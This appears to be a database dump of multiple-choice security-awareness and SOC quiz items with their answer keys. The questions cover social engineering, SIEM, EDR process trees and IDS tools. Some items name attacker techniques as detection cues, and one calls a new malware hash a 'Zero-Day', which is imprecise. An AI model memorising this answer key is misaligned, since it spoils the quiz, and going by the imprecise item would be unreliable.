(5847, 202, 'Who is a common persona for attackers to impersonate?', 2, 'IT Support', 0, 'Help Desk', '2025-12-26 22:28:54', '[\"The Janitor\", \"IT Support\", \"A stranger\", \"A dog\"]'),
(5848, 202, 'How do you defeat an impersonator on the phone?', 3, 'Call them back on a verified number', 0, 'Callback', '2025-12-26 22:28:54', '[\"Ask their name\", \"Call them back on a verified number\", \"Yell at them\", \"Tracing the call\"]'),
(5849, 203, 'What is \"Vishing\"?', 1, 'Phishing conducted over the phone', 0, 'Voice', '2025-12-26 22:28:54', '[\"Video Phishing\", \"Phishing conducted over the phone\", \"Virtual Fishing\", \"Virus Phishing\"]'),
(5850, 203, 'Why is Caller ID not a reliable way to verify a caller?', 2, 'It can be easily spoofed', 0, 'Fake numbers', '2025-12-26 22:28:54', '[\"It is encrypted\", \"It can be easily spoofed\", \"It costs money\", \"It is old tech\"]'),
(5851, 203, 'What payment method is a major red flag for scam calls?', 3, 'Gift Cards', 0, 'iTunes', '2025-12-26 22:28:54', '[\"Credit Card\", \"Gift Cards\", \"Wire Transfer\", \"Check\"]'),
(5852, 204, 'What makes Smishing URLs harder to inspect than email URLs?', 1, 'Mobile interfaces make hovering/previewing difficult', 0, 'No mouse', '2025-12-26 22:28:54', '[\"They are encrypted\", \"Mobile interfaces make hovering/previewing difficult\", \"They are faster\", \"They are secure\"]'),
(5853, 204, 'What is a common \"Lure\" for SMS attacks?', 2, 'Missed package delivery', 0, 'USPS', '2025-12-26 22:28:54', '[\"Free pizza\", \"Missed package delivery\", \"Weather alert\", \"News update\"]'),
(5854, 204, 'If you get a suspicious text from your \"Bank\", what should you do?', 3, 'Log in via the official App or Website', 0, 'Direct access', '2025-12-26 22:28:54', '[\"Click the link\", \"Log in via the official App or Website\", \"Reply STOP\", \"Call the number in the text\"]'),
(5855, 205, 'What constitutes \"Tailgating\"?', 1, 'Following someone into a secure area without badging in', 0, 'Piggyback', '2025-12-26 22:28:54', '[\"Driving too close\", \"Following someone into a secure area without badging in\", \"Breaking a lock\", \"Hacking a badge reader\"]'),
(5856, 205, 'How do attackers exploit \"politeness\" to bypass physical security?', 2, 'Holding the door for someone carrying items', 0, 'Heavy box', '2025-12-26 22:28:54', '[\"Buying lunch\", \"Holding the door for someone carrying items\", \"Saying please\", \"Dressing nice\"]'),
(5857, 205, 'What is the primary defense against Dumpster Diving?', 3, 'Shredding sensitive documents', 0, 'Shred', '2025-12-26 22:28:54', '[\"Burning trash\", \"Shredding sensitive documents\", \"Recycling\", \"Hiding trash\"]'),
(5858, 206, 'What is a \"USB Drop\" attack?', 1, 'Leaving an infected USB drive for a victim to find', 0, 'Bait', '2025-12-26 22:28:54', '[\"Throwing USBs at people\", \"Leaving an infected USB drive for a victim to find\", \"Stealing USBs\", \"Buying USBs\"]'),
(5859, 206, 'What human emotion does Baiting primarily exploit?', 2, 'Curiosity', 0, 'Wonder', '2025-12-26 22:28:54', '[\"Fear\", \"Curiosity\", \"Greed\", \"Sadness\"]'),
(5860, 206, 'How does Quid Pro Quo differ from Baiting?', 3, 'It involves an exchange of service/help', 0, 'Exchange', '2025-12-26 22:28:54', '[\"It is faster\", \"It involves an exchange of service/help\", \"It is digital only\", \"It uses email\"]'),
(5861, 207, 'Which Cialdini principle explains why people comply with requests from \"The CEO\"?', 1, 'Authority', 0, 'Boss', '2025-12-26 22:28:54', '[\"Liking\", \"Authority\", \"Scarcity\", \"Reciprocity\"]'),
(5862, 207, 'If an attacker does you a favor to make you feel obligated, which principle is this?', 2, 'Reciprocity', 0, 'Owe me', '2025-12-26 22:28:54', '[\"Social Proof\", \"Reciprocity\", \"Authority\", \"Commitment\"]'),
(5863, 207, '\"Only 2 spots left!\" is an example of:', 3, 'Scarcity', 0, 'Rare', '2025-12-26 22:28:54', '[\"Authority\", \"Scarcity\", \"Consistency\", \"Liking\"]'),
(5864, 207, 'What is the best way to verify a \"Bank\" calling you?', 4, 'Hang up and call the number on your card', 0, 'Source of truth', '2025-12-26 22:28:54', '[\"Ask for their ID\", \"Hang up and call the number on your card\", \"Trust Caller ID\", \"Ask for a supervisor\"]'),
(5865, 207, 'What is \"Pretexting\"?', 5, 'Creating a fabricated scenario to obtain info', 0, 'Lying scenario', '2025-12-26 22:28:54', '[\"Using text messages\", \"Creating a fabricated scenario to obtain info\", \"Pre-authorized scanning\", \"Testing backups\"]'),
(5866, 207, 'Which technology has made Vishing much more dangerous recently?', 6, 'AI Voice Cloning / Deepfakes', 0, 'AI', '2025-12-26 22:28:54', '[\"5G\", \"AI Voice Cloning / Deepfakes\", \"Fiber Optics\", \"VoIP\"]'),
(5867, 207, 'Why are shortened URLs (bit.ly) dangerous in SMS?', 7, 'They hide the true destination', 0, 'Obfuscation', '2025-12-26 22:28:54', '[\"They are slow\", \"They hide the true destination\", \"They cost money\", \"They assume HTTP\"]'),
(5868, 207, 'What is the term for Phishing via SMS?', 8, 'Smishing', 0, 'SMS', '2025-12-26 22:28:54', '[\"Vishing\", \"Smishing\", \"Phishing\", \"Texting\"]'),
(5869, 207, 'Where should you report spam texts?', 9, '7726 (SPAM)', 0, 'Carrier code', '2025-12-26 22:28:54', '[\"911\", \"7726 (SPAM)\", \"The Police\", \"Your Mom\"]'),
(5870, 207, 'What is \"Tailgating\"?', 10, 'Following an authorized person through a secure door', 0, 'Piggybacking', '2025-12-26 22:28:54', '[\"Driving close\", \"Following an authorized person through a secure door\", \"Hacking the lock\", \"Climbing the fence\"]'),
(5871, 207, 'What is the counter-measure for \"Dumpster Diving\"?', 11, 'Shredding documents', 0, 'Destruction', '2025-12-26 22:28:54', '[\"Recycling\", \"Shredding documents\", \"burning\", \"hiding\"]'),
(5872, 207, 'What is \"Shoulder Surfing\"?', 12, 'Looking at someone\'s screen/keyboard to steal info', 0, 'Peeking', '2025-12-26 22:28:54', '[\"Massaging shoulders\", \"Looking at someone\'s screen/keyboard to steal info\", \"Surfing the web\", \"Hacking wifi\"]'),
(5873, 207, 'If you find a USB drive labeled \"Payroll\" in the lobby, what should you do?', 13, 'Do not plug it in; give to Security', 0, 'Quarantine', '2025-12-26 22:28:54', '[\"Plug it in to check\", \"Do not plug it in; give to Security\", \"Throw it away\", \"Keep it\"]'),
(5874, 207, 'Establishing a fake \"Free WiFi\" spot to steal data is called:', 14, 'Evil Twin', 0, 'WiFi Clone', '2025-12-26 22:28:54', '[\"Bad Twin\", \"Evil Twin\", \"Good Twin\", \"Rogue AP\"]'),
(5875, 207, '\"Quid Pro Quo\" means:', 15, 'Something for Something', 0, 'Exchange', '2025-12-26 22:28:54', '[\"Free for all\", \"Something for Something\", \"Nothing for Nothing\", \"Quick Pro\"]'),
(5876, 207, 'What is the weakest link in most security systems?', 16, 'The Human', 0, 'People', '2025-12-26 22:28:54', '[\"The Firewall\", \"The Human\", \"The Encryption\", \"The Password\"]'),
(5877, 207, 'Does Social Engineering always involve a computer?', 17, 'No (Physical/Phone)', 0, 'No', '2025-12-26 22:28:54', '[\"Yes\", \"No (Physical/Phone)\", \"Maybe\", \"Only on Tuesdays\"]'),
(5878, 207, 'What implies \"Social Proof\"?', 18, '\"9 out of 10 users did this\"', 0, 'Crowd', '2025-12-26 22:28:54', '[\"\\\"I am the boss\\\"\", \"\\\"9 out of 10 users did this\\\"\", \"\\\"This is rare\\\"\", \"\\\"I like you\\\"\"]'),
(5879, 207, 'Why do attackers target new employees?', 19, 'They are eager to please and don\'t know procedures', 0, 'Newbies', '2025-12-26 22:28:54', '[\"They have more access\", \"They are eager to please and don\'t know procedures\", \"They make more money\", \"They are dumb\"]'),
(5880, 207, 'What is the best general defense against Social Engineering?', 20, 'Security Awareness Training & skepticism', 0, 'Training', '2025-12-26 22:28:54', '[\"Better Firewalls\", \"Security Awareness Training & skepticism\", \"More Antivirus\", \"Blocking Email\"]'),
(5881, 221, 'What is the primary function of \"Correlation\" in a SIEM?', 1, 'Connecting related events to detect threats', 0, 'Connecting dots', '2025-12-26 22:35:58', '[\"Saving storage space\", \"Connecting related events to detect threats\", \"Deleting old logs\", \"Speeding up the network\"]'),
(5882, 221, 'Why is \"Retention\" important?', 2, 'Compliance and Forensic Investigation', 0, 'History', '2025-12-26 22:35:58', '[\"To fill up hard drives\", \"Compliance and Forensic Investigation\", \"To slow down the system\", \"It is not important\"]'),
(5883, 221, 'What component typically sits on the Endpoint to send logs?', 3, 'Forwarder / Agent', 0, 'Sender', '2025-12-26 22:35:58', '[\"Firewall\", \"Forwarder / Agent\", \"Router\", \"Switch\"]'),
(5884, 222, 'Which protocol is the standard for network device logging?', 1, 'Syslog', 0, 'Standard', '2025-12-26 22:35:58', '[\"SMB\", \"Syslog\", \"FTP\", \"HTTP\"]'),
(5885, 222, 'What is \"NetFlow\" data?', 2, 'Traffic metadata (Who talked to Whom)', 0, 'Traffic info', '2025-12-26 22:35:58', '[\"Full packet capture\", \"Traffic metadata (Who talked to Whom)\", \"Email contents\", \"File contents\"]'),
(5886, 222, 'Why is \"Time Zone\" alignment critical in SIEM?', 3, 'To accurately correlate events across the world', 0, 'Timeline', '2025-12-26 22:35:58', '[\"It isn\'t\", \"To accurately correlate events across the world\", \"To know when to eat lunch\", \"For daylight savings\"]'),
(5887, 223, 'What is the goal of \"Normalization\"?', 1, 'Converting mixed formats into a standard field structure', 0, 'Standardization', '2025-12-26 22:35:58', '[\"Deleting logs\", \"Converting mixed formats into a standard field structure\", \"Encrypting logs\", \"Compressing logs\"]'),
(5888, 223, 'If Windows calls it \"AccountName\" and Linux calls it \"User\", what does the SIEM do?', 2, 'Maps them to a single field like user.name', 0, 'Mapping', '2025-12-26 22:35:58', '[\"Ignores them\", \"Maps them to a single field like user.name\", \"Deletes one\", \"Errors out\"]'),
(5889, 223, 'What process extracts \"192.168.1.1\" from a raw text message?', 3, 'Parsing', 0, 'Extraction', '2025-12-26 22:35:58', '[\"Hashing\", \"Parsing\", \"Encryption\", \"Routing\"]'),
(5890, 224, 'What defines a \"Brute Force\" correlation rule?', 1, 'Multiple failed logins in a short time', 0, 'Many fails', '2025-12-26 22:35:58', '[\"One failed login\", \"Multiple failed logins in a short time\", \"A successful login\", \"A slow login\"]'),
(5891, 224, 'What is \"Impossible Travel\"?', 2, 'Logins from two distant locations in an impossibly short time', 0, 'Teleportation', '2025-12-26 22:35:58', '[\"Traveling without a visa\", \"Logins from two distant locations in an impossibly short time\", \"VPN usage\", \"Remote work\"]'),
(5892, 224, 'Adjusting a rule to reduce False Positives is called:', 3, 'Tuning', 0, 'Adjustment', '2025-12-26 22:35:58', '[\"Breaking\", \"Tuning\", \"Deleting\", \"Ignoring\"]'),
(5893, 225, 'What query language does Splunk use?', 1, 'SPL (Search Processing Language)', 0, 'SPL', '2025-12-26 22:35:58', '[\"SQL\", \"SPL (Search Processing Language)\", \"KQL\", \"Python\"]'),
(5894, 225, 'What query language does Microsoft Sentinel use?', 2, 'KQL (Kusto Query Language)', 0, 'Kusto', '2025-12-26 22:35:58', '[\"SPL\", \"KQL (Kusto Query Language)\", \"Bash\", \"PowerShell\"]'),
(5895, 225, 'What is a major downside of Splunk traditionally?', 3, 'High cost', 0, 'Expensive', '2025-12-26 22:35:58', '[\"It is slow\", \"High cost\", \"It has no features\", \"It only runs on Mac\"]'),
(5896, 226, 'Which component of ELK provides the Visualization / Dashboard?', 1, 'Kibana', 0, 'UI', '2025-12-26 22:35:58', '[\"Elasticsearch\", \"Kibana\", \"Logstash\", \"Beats\"]'),
(5897, 226, 'What is the Database/Search Engine of the stack?', 2, 'Elasticsearch', 0, 'DB', '2025-12-26 22:35:58', '[\"MySQL\", \"Elasticsearch\", \"Redis\", \"Mongo\"]'),
(5898, 226, 'What are \"Beats\"?', 3, 'Lightweight data shippers/agents', 0, 'Agents', '2025-12-26 22:35:58', '[\"Music files\", \"Lightweight data shippers/agents\", \"Databases\", \"Firewalls\"]'),
(5899, 227, 'What makes Wazuh unique compared to basic ELK?', 1, 'It includes XDR features like FIM and Active Response', 0, 'XDR', '2025-12-26 22:35:58', '[\"It costs money\", \"It includes XDR features like FIM and Active Response\", \"It has no UI\", \"It creates viruses\"]'),
(5900, 227, 'What is \"Active Response\" in Wazuh?', 2, 'The ability to automatically block/stop a threat', 0, 'Action', '2025-12-26 22:35:58', '[\"Sending an email\", \"The ability to automatically block/stop a threat\", \"Deleting the server\", \"Calling the police\"]'),
(5901, 227, 'Is Wazuh open source?', 3, 'Yes', 0, 'Free', '2025-12-26 22:35:58', '[\"No\", \"Yes\", \"Only for students\", \"It is a subscription\"]'),
(5902, 228, 'What is the \"Normalization\" phase in SIEM?', 1, 'Mapping different log formats to standard fields', 0, 'Standardize', '2025-12-26 22:35:58', '[\"Compressing logs\", \"Mapping different log formats to standard fields\", \"Deleting logs\", \"Encrypting logs\"]'),
(5903, 228, 'Garbage In, Garbage Out refers to:', 2, 'A SIEM is only as good as the log data fed into it', 0, 'Input quality', '2025-12-26 22:35:58', '[\"Trash management\", \"A SIEM is only as good as the log data fed into it\", \"Deleting logs\", \"Hardware recycling\"]'),
(5904, 228, 'What is \"Impossible Travel\"?', 3, 'Logins from two locations physically impossible to traverse in the time', 0, 'Teleportation', '2025-12-26 22:35:58', '[\"VPN usage\", \"Logins from two locations physically impossible to traverse in the time\", \"Dual citizenship\", \"Space travel\"]'),
(5905, 228, 'SPL (Search Processing Language) belongs to which SIEM?', 4, 'Splunk', 0, 'The big one', '2025-12-26 22:35:58', '[\"Sentinel\", \"Splunk\", \"Wazuh\", \"ELK\"]'),
(5906, 228, 'KQL (Kusto Query Language) belongs to which SIEM?', 5, 'Microsoft Sentinel', 0, 'Azure', '2025-12-26 22:35:58', '[\"Splunk\", \"Microsoft Sentinel\", \"QRadar\", \"ArcSight\"]'),
(5907, 228, 'Which open-source tool allows for \"Active Response\" (blocking IPs)?', 6, 'Wazuh', 0, 'XDR', '2025-12-26 22:35:58', '[\"Logstash\", \"Wazuh\", \"Kibana\", \"Notepad\"]'),
(5908, 228, 'In the ELK stack, which tool is the \"UI\"?', 7, 'Kibana', 0, 'Visualizer', '2025-12-26 22:35:58', '[\"Elasticsearch\", \"Kibana\", \"Logstash\", \"Filebeat\"]'),
(5909, 228, 'What does a \"Forwarder\" do?', 8, 'Sends logs from the endpoint to the SIEM', 0, 'Transportation', '2025-12-26 22:35:58', '[\"Stores logs\", \"Sends logs from the endpoint to the SIEM\", \"Deletes logs\", \"Analyzes logs\"]'),
(5910, 228, 'Why do we need \"Retention\"?', 9, 'Compliance regulations often require keeping logs for 1 year+', 0, 'Compliance', '2025-12-26 22:35:58', '[\"To run out of space\", \"Compliance regulations often require keeping logs for 1 year+\", \"To slow down searches\", \"We don\'t\"]'),
(5911, 231, 'What is the Attacker\'s IP address?', 1, '192.168.1.55', 0, 'IP', '2025-12-26 22:41:26', '[\"127.0.0.1\", \"192.168.1.55\", \"10.0.0.1\", \"8.8.8.8\"]'),
(5912, 231, 'Did the attacker succeed?', 2, 'Yes, the last log says \"Accepted\"', 0, 'Success', '2025-12-26 22:41:26', '[\"No, all failed\", \"Yes, the last log says \\\"Accepted\\\"\", \"Maybe\", \"Unknown\"]'),
(5913, 231, 'Which account was targeted?', 3, 'root', 0, 'Admin', '2025-12-26 22:41:26', '[\"admin\", \"user\", \"root\", \"guest\"]'),
(5914, 232, 'What is the time interval between connections?', 1, '5 Minutes', 0, 'Regularity', '2025-12-26 22:41:26', '[\"1 Minute\", \"5 Minutes\", \"Random\", \"1 Hour\"]'),
(5915, 232, 'Why is \"Regularity\" suspicious?', 2, 'Machines are precise, humans are random', 0, 'Automation', '2025-12-26 22:41:26', '[\"It isn\'t\", \"Machines are precise, humans are random\", \"It means the network is fast\", \"It is normal\"]'),
(5916, 232, 'What destination IP is the victim talking to?', 3, '45.33.2.1', 0, 'C2', '2025-12-26 22:41:26', '[\"10.10.1.100\", \"127.0.0.1\", \"45.33.2.1\", \"192.168.1.1\"]'),
(5917, 233, 'What is the time difference between the two logins?', 1, '1 hour 15 minutes', 0, 'Delta', '2025-12-26 22:41:26', '[\"5 minutes\", \"1 hour 15 minutes\", \"8 hours\", \"1 day\"]'),
(5918, 233, 'Which user account is affected?', 2, 'alice@company.com', 0, 'User', '2025-12-26 22:41:26', '[\"bob\", \"admin\", \"alice@company.com\", \"root\"]'),
(5919, 233, 'What is the most likely malicious explanation?', 3, 'Credential Theft', 0, 'Stolen Creds', '2025-12-26 22:41:26', '[\"VPN\", \"Credential Theft\", \"Fast Plane\", \"Bug\"]'),
(5920, 234, 'Which group was the user added to?', 1, 'Domain Admins', 0, 'Admin', '2025-12-26 22:41:26', '[\"Users\", \"Guests\", \"Domain Admins\", \"Print Operators\"]'),
(5921, 234, 'What Windows Event ID indicates \"Member Added to Group\"?', 2, '4728', 0, 'ID', '2025-12-26 22:41:26', '[\"4624\", \"4728\", \"1102\", \"514\"]'),
(5922, 234, 'Why is the timestamp (03:00 AM) relevant?', 3, 'Off-hours changes are suspicious', 0, 'Night', '2025-12-26 22:41:26', '[\"It is daytime\", \"Off-hours changes are suspicious\", \"Servers restart then\", \"It is normal\"]'),
(5923, 235, 'What is hidden inside the long subdomains?', 1, 'Exfiltrated Data (Encoded)', 0, 'Stolen integrity', '2025-12-26 22:41:26', '[\"Nothing\", \"Exfiltrated Data (Encoded)\", \"IP addresses\", \"Viruses\"]'),
(5924, 235, 'Why do attackers use DNS for exfiltration?', 2, 'Firewalls usually allow Port 53 (DNS) outbound', 0, 'Port 53', '2025-12-26 22:41:26', '[\"It is faster\", \"Firewalls usually allow Port 53 (DNS) outbound\", \"It is encrypted\", \"It compresses data\"]'),
(5925, 235, 'What characteristic of the query string indicates tunneling?', 3, 'Length and High Entropy (Randomness)', 0, 'Long', '2025-12-26 22:41:26', '[\"Short length\", \"Length and High Entropy (Randomness)\", \"It is .com\", \"It is readable\"]'),
(5926, 236, 'In the Firewall log, what is the source IP doing?', 1, 'Port Scanning (trying different ports rapidly)', 0, 'SCAN', '2025-12-26 22:41:26', '[\"Downloading files\", \"Port Scanning (trying different ports rapidly)\", \"Updating\", \"Browsing web\"]'),
(5927, 236, 'What action did the firewall take?', 2, 'BLOCK', 0, 'Action', '2025-12-26 22:41:26', '[\"ALLOW\", \"BLOCK\", \"PASS\", \"LOG\"]'),
(5928, 236, 'What event ID represents a Successful Login?', 3, '4624', 0, 'ID', '2025-12-26 22:41:26', '[\"4625\", \"4624\", \"1000\", \"52\"]'),
(5929, 236, 'What time did the login occur?', 4, '02:00 AM', 0, 'Time', '2025-12-26 22:41:26', '[\"23:55\", \"02:00 AM\", \"Noon\", \"Midnight\"]'),
(5930, 236, 'In the Brute Force scenario, what indicates success?', 5, 'A \"Success\" or \"Accepted\" log after failures', 0, 'Win', '2025-12-26 22:41:26', '[\"More failures\", \"A \\\"Success\\\" or \\\"Accepted\\\" log after failures\", \"Nothing\", \"A lockout\"]'),
(5931, 236, 'How do you detect \"Beaconing\"?', 6, 'Regular time intervals (Heartbeat)', 0, 'Rhythm', '2025-12-26 22:41:26', '[\"High bandwidth\", \"Regular time intervals (Heartbeat)\", \"Random times\", \"Different IPs\"]'),
(5932, 241, 'What does EDR primarily monitor?', 1, 'Endpoint activities (Processes, Files, Network)', 0, 'Endpoint', '2025-12-26 22:47:08', '[\"Network traffic only\", \"Endpoint activities (Processes, Files, Network)\", \"Server hardware\", \"Cloud storage\"]'),
(5933, 241, 'What is a key \"Response\" capability of EDR?', 2, 'Isolating a machine from the network', 0, 'Containment', '2025-12-26 22:47:08', '[\"Sending email alerts\", \"Isolating a machine from the network\", \"Writing reports\", \"Installing updates\"]'),
(5934, 241, 'Where does the EDR Agent run?', 3, 'On each endpoint (laptop/server)', 0, 'Client side', '2025-12-26 22:47:08', '[\"In the cloud\", \"On the firewall\", \"On each endpoint (laptop/server)\", \"In a SIEM\"]'),
(5935, 242, 'What is the primary detection method for traditional Antivirus?', 1, 'Signatures (File Hashes)', 0, 'Hash', '2025-12-26 22:47:08', '[\"Behavior analysis\", \"Signatures (File Hashes)\", \"AI\", \"Network scanning\"]'),
(5936, 242, 'If malware uses a brand-new hash, what is this called?', 2, 'Zero-Day', 0, 'New', '2025-12-26 22:47:08', '[\"First-Day\", \"Zero-Day\", \"New Hash\", \"Fresh Malware\"]'),
(5937, 242, 'What does EDR provide that AV typically does not?', 3, 'Full context and telemetry (Process Tree, etc.)', 0, 'Visibility', '2025-12-26 22:47:08', '[\"A firewall\", \"Full context and telemetry (Process Tree, etc.)\", \"Email scanning\", \"Physical security\"]'),
(5938, 243, 'What does a Process Tree show?', 1, 'Which process started which other process', 0, 'Ancestry', '2025-12-26 22:47:08', '[\"Network connections\", \"Which process started which other process\", \"File locations\", \"User logins\"]'),
(5939, 243, 'In \"explorer.exe -> chrome.exe\", which is the Parent?', 2, 'explorer.exe', 0, 'Desktop', '2025-12-26 22:47:08', '[\"chrome.exe\", \"explorer.exe\", \"System\", \"Neither\"]'),
(5940, 243, 'Why is \"winword.exe -> cmd.exe -> powershell.exe\" suspicious?', 3, 'Office apps should not spawn shells', 0, 'Unexpected child', '2025-12-26 22:47:08', '[\"It is normal\", \"Office apps should not spawn shells\", \"PowerShell is fast\", \"CMD is old\"]'),
(5941, 244, 'Which parent legitimately spawns svchost.exe?', 1, 'services.exe', 0, 'Services Manager', '2025-12-26 22:47:08', '[\"explorer.exe\", \"word.exe\", \"services.exe\", \"chrome.exe\"]'),
(5942, 244, 'If Excel spawns wscript.exe, what is the likely cause?', 2, 'A malicious VBA Macro', 0, 'Macro', '2025-12-26 22:47:08', '[\"A print job\", \"A malicious VBA Macro\", \"An update\", \"Normal behavior\"]'),
(5943, 244, 'What does \"-EncodedCommand\" in PowerShell indicate?', 3, 'Base64-encoded script (often malicious)', 0, 'Obfuscation', '2025-12-26 22:47:08', '[\"Help text\", \"Fast mode\", \"Base64-encoded script (often malicious)\", \"Admin mode\"]'),
(5944, 245, 'In a phishing attack, which application typically spawns cmd.exe?', 1, 'The Office application (Word/Excel)', 0, 'Office', '2025-12-26 22:47:08', '[\"Explorer\", \"The Office application (Word/Excel)\", \"Chrome\", \"Notepad\"]'),
(5945, 245, 'What does \"Living off the Land\" mean?', 2, 'Using built-in tools (PowerShell, WMI) instead of malware', 0, 'No foreign tools', '2025-12-26 22:47:08', '[\"Farming\", \"Using built-in tools (PowerShell, WMI) instead of malware\", \"Using old malware\", \"Running slowly\"]'),
(5946, 245, 'Why is \"certutil\" used by attackers?', 3, 'It can download files (LOLBIN)', 0, 'Built-in downloader', '2025-12-26 22:47:08', '[\"It encrypts data\", \"It can download files (LOLBIN)\", \"It scans networks\", \"It deletes logs\"]'),
(5947, 246, 'Which EDR is famous for APT tracking (e.g., Fancy Bear)?', 1, 'CrowdStrike', 0, 'Falcon', '2025-12-26 22:47:08', '[\"SentinelOne\", \"CrowdStrike\", \"Carbon Black\", \"Elastic\"]'),
(5948, 246, 'Which EDR is native to Windows and uses KQL?', 2, 'Microsoft Defender for Endpoint', 0, 'MDE', '2025-12-26 22:47:08', '[\"CrowdStrike\", \"SentinelOne\", \"Microsoft Defender for Endpoint\", \"Carbon Black\"]'),
(5949, 246, 'Which EDR can autonomously \"rollback\" ransomware damage?', 3, 'SentinelOne', 0, 'Autonomous', '2025-12-26 22:47:08', '[\"CrowdStrike\", \"Carbon Black\", \"SentinelOne\", \"Elastic\"]'),
(5950, 247, 'What is the Grandparent of powershell.exe?', 1, 'WINWORD.EXE', 0, 'Word', '2025-12-26 22:47:08', '[\"explorer.exe\", \"outlook.exe\", \"WINWORD.EXE\", \"cmd.exe\"]'),
(5951, 247, 'What is the likely initial attack vector?', 2, 'A malicious email attachment (phishing)', 0, 'Phishing', '2025-12-26 22:47:08', '[\"USB drive\", \"A malicious email attachment (phishing)\", \"Direct network attack\", \"Insider\"]'),
(5952, 247, 'What do whoami, ipconfig, net user suggest?', 3, 'Reconnaissance / Discovery', 0, 'Recon', '2025-12-26 22:47:08', '[\"Cleanup\", \"Reconnaissance / Discovery\", \"Data destruction\", \"Patching\"]'),
(5953, 247, 'The \"-enc\" flag in PowerShell indicates:', 4, 'Base64-encoded command (obfuscation)', 0, 'Hidden command', '2025-12-26 22:47:08', '[\"Encryption\", \"Base64-encoded command (obfuscation)\", \"Error logging\", \"Network mode\"]'),
(5954, 247, 'What is the key difference between AV and EDR?', 5, 'EDR provides visibility and behavior analysis', 0, 'Telemetry', '2025-12-26 22:47:08', '[\"EDR is cheaper\", \"EDR provides visibility and behavior analysis\", \"AV is newer\", \"AV blocks more\"]'),
(5955, 247, 'Which process is the legitimate parent of svchost.exe?', 6, 'services.exe', 0, 'Service Controller', '2025-12-26 22:47:08', '[\"explorer.exe\", \"winlogon.exe\", \"services.exe\", \"cmd.exe\"]'),
(5956, 251, 'Where is a NIDS typically deployed?', 1, 'At network choke points (e.g., behind firewall)', 0, 'Network edge', '2025-12-26 22:50:58', '[\"On each laptop\", \"At network choke points (e.g., behind firewall)\", \"In the cloud only\", \"On the router console\"]'),
(5957, 251, 'What is a major weakness of NIDS?', 2, 'Blind to encrypted traffic (TLS)', 0, 'Encryption', '2025-12-26 22:50:58', '[\"It is slow\", \"Blind to encrypted traffic (TLS)\", \"It needs batteries\", \"It cannot see packets\"]'),
(5958, 251, 'Which tool is a common HIDS agent?', 3, 'OSSEC / Wazuh', 0, 'Host agent', '2025-12-26 22:50:58', '[\"Snort\", \"OSSEC / Wazuh\", \"Wireshark\", \"Nmap\"]'),
(5959, 252, 'What is the main weakness of Signature-Based detection?', 1, 'Cannot detect Zero-Day (unknown) attacks', 0, 'New threats', '2025-12-26 22:50:58', '[\"Too many alerts\", \"Cannot detect Zero-Day (unknown) attacks\", \"It is expensive\", \"It requires hardware\"]'),
(5960, 252, 'Anomaly-Based detection learns a _____ of normal behavior.', 2, 'Baseline', 0, 'Normal', '2025-12-26 22:50:58', '[\"Signature\", \"Baseline\", \"Firewall\", \"Password\"]'),
(5961, 252, 'Which method typically has more False Positives?', 3, 'Anomaly-Based', 0, 'Noisy', '2025-12-26 22:50:58', '[\"Signature-Based\", \"Anomaly-Based\", \"Neither\", \"Both equally\"]'),
(5962, 253, 'In a Snort rule, what does \"sid\" stand for?', 1, 'Signature ID', 0, 'Unique ID', '2025-12-26 22:50:58', '[\"Session ID\", \"Signature ID\", \"Source ID\", \"Snort ID\"]'),
(5963, 253, 'What action does \"alert\" perform in Snort?', 2, 'Logs and generates an alert', 0, 'Notify', '2025-12-26 22:50:58', '[\"Blocks traffic\", \"Logs and generates an alert\", \"Drops the packet\", \"Ignores it\"]'),
(5964, 253, 'What symbol defines direction in Snort rules?', 3, '-> (Arrow)', 0, 'Arrow', '2025-12-26 22:50:58', '[\"<-\", \"-> (Arrow)\", \"==\", \"=>\"]'),
(5965, 254, 'What is a major performance advantage of Suricata over Snort 2?', 1, 'Multi-threading (uses all CPU cores)', 0, 'Parallel', '2025-12-26 22:50:58', '[\"It is smaller\", \"Multi-threading (uses all CPU cores)\", \"It has a GUI\", \"It is older\"]'),
(5966, 254, 'Can Suricata use Snort rules?', 2, 'Yes', 0, 'Compatible', '2025-12-26 22:50:58', '[\"No\", \"Yes\", \"Only some\", \"Only paid\"]'),
(5967, 254, 'What does Suricata\'s \"File Extraction\" feature do?', 3, 'Saves suspicious files from network traffic', 0, 'Carving', '2025-12-26 22:50:58', '[\"Deletes files\", \"Saves suspicious files from network traffic\", \"Encrypts files\", \"Compresses files\"]'),
(5968, 255, 'What is the first step when triaging an IDS alert?', 1, 'Read the alert message to understand the claim', 0, 'Understand', '2025-12-26 22:50:58', '[\"Delete it\", \"Read the alert message to understand the claim\", \"Block the IP\", \"Reboot the server\"]'),
(5969, 255, 'What often causes False Positives from internal security scanners?', 2, 'Scanners like Nessus trigger \"Port Scan\" rules', 0, 'Your own tools', '2025-12-26 22:50:58', '[\"Hackers\", \"Scanners like Nessus trigger \\\"Port Scan\\\" rules\", \"Viruses\", \"Weather\"]'),
(5970, 255, 'What is \"Tuning\" an IDS rule?', 3, 'Adjusting it to reduce false positives', 0, 'Improve accuracy', '2025-12-26 22:50:58', '[\"Deleting the rule\", \"Adjusting it to reduce false positives\", \"Making it louder\", \"Breaking it\"]'),
(5971, 256, 'Which IDS type monitors network traffic at a choke point?', 1, 'NIDS', 0, 'Network', '2025-12-26 22:50:58', '[\"HIDS\", \"NIDS\", \"SIDS\", \"AIDS\"]'),
(5972, 256, 'Which IDS type can see inside encrypted sessions on the host?', 2, 'HIDS', 0, 'Host', '2025-12-26 22:50:58', '[\"NIDS\", \"HIDS\", \"Firewall\", \"VPN\"]'),
(5973, 256, 'Signature-Based detection relies on:', 3, 'A database of known attack patterns', 0, 'Signatures', '2025-12-26 22:50:58', '[\"Learning normal behavior\", \"A database of known attack patterns\", \"User reports\", \"Random chance\"]'),
(5974, 256, 'Anomaly-Based detection can find:', 4, 'Zero-Day attacks', 0, 'Novel threats', '2025-12-26 22:50:58', '[\"Only known attacks\", \"Zero-Day attacks\", \"Nothing\", \"Old malware\"]'),
(5975, 256, 'Which tool is native multi-threaded?', 5, 'Suricata', 0, 'Performance', '2025-12-26 22:50:58', '[\"Snort 2\", \"Suricata\", \"Wireshark\", \"Nmap\"]'),
(5976, 256, 'In Snort, what does \"msg\" specify?', 6, 'The alert message text', 0, 'Description', '2025-12-26 22:50:58', '[\"Source IP\", \"The alert message text\", \"Destination port\", \"Protocol\"]'),
(5977, 261, 'Which malware type encrypts your files and demands payment?', 1, 'Ransomware', 0, 'Ransom', '2025-12-26 22:55:56', '[\"Spyware\", \"Ransomware\", \"Worm\", \"Virus\"]'),
